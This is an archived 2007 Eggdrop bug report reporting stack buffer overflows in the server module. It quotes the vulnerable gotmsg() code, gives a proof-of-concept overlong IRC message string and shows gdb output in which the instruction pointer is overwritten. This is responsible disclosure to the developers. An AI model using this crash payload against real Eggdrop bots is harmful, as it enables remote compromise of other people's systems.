Eggdev: [Bug 462] New: multiple buffer overflows in server module

bugzilla-daemon at tsss.org bugzilla-daemon at tsss.org
Thu Apr 19 20:56:41 CST 2007


http://www.eggheads.org/bugzilla/show_bug.cgi?id=462

           Summary: multiple buffer overflows in server module
           Product: Eggdrop 1.6
           Version: 1.6.18
          Platform: PC
        OS/Version: All
            Status: NEW
          Severity: normal
          Priority: P2
         Component: Module: server.mod
        AssignedTo: eggdev at eggheads.org
        ReportedBy: bow.sineath at gmail.com


This email was sent to bugs@ several days ago, I thought it was worth posting
here. I searched and didn't see where anyone else had reported it
(surprisingly). Here goes:

I was taking a quick look at some of the code behind the eggie server module and
I ran across a few stack based overflows. I am incredibly surprised that no one
has reported these yet.

It seems that you are relying on the fact that the server the bot is connected
to is sane and not malicious, but I was able to exploit these flaws by opening a
netcat listener and connecting the bot to it, then sending whatever string I
needed to.

For example:

static int gotmsg(char *from, char *msg)
{
  char *to, buf[UHOSTLEN], *nick, ctcpbuf[512], *uhost = buf, *ctcp,
       *p, *p1, *code;

........

ignoring = match_ignore(from);
  to = newsplit(&msg);
  fixcolon(msg);
  /* Only check if flood-ctcp is active */
  strcpy(uhost, from);

By sending the following string:

:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAABBBB PRIVMSG Lamestbot :test

(thats 368 bytes)

gdb output:

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 14990]
0x42424242 in ?? ()
(gdb) i r $eip
eip            0x42424242       0x42424242

You overwrite the instruction pointer with 0x42424242. It should be obvious that
this could allow remote code execution as well. I didn't spend too much time
looking at the rest of the code, this just happened to catch my eye while I was
glancing over it. I did notice a few others that were along the same lines as
this, but I didn't test them or document them, although I would be happy to do
if you want more information.

Given the fact that you have to convince someone to connect to a malicious
server, this isn't -THAT- serious, but if someone had the proper console
permissions or was able to coerce someone to connect their eggdrop to a 
malicious server, then it could result in a compromise.



------- You are receiving this mail because: -------
You are the assignee for the bug, or are watching the assignee.



More information about the Eggdev mailing list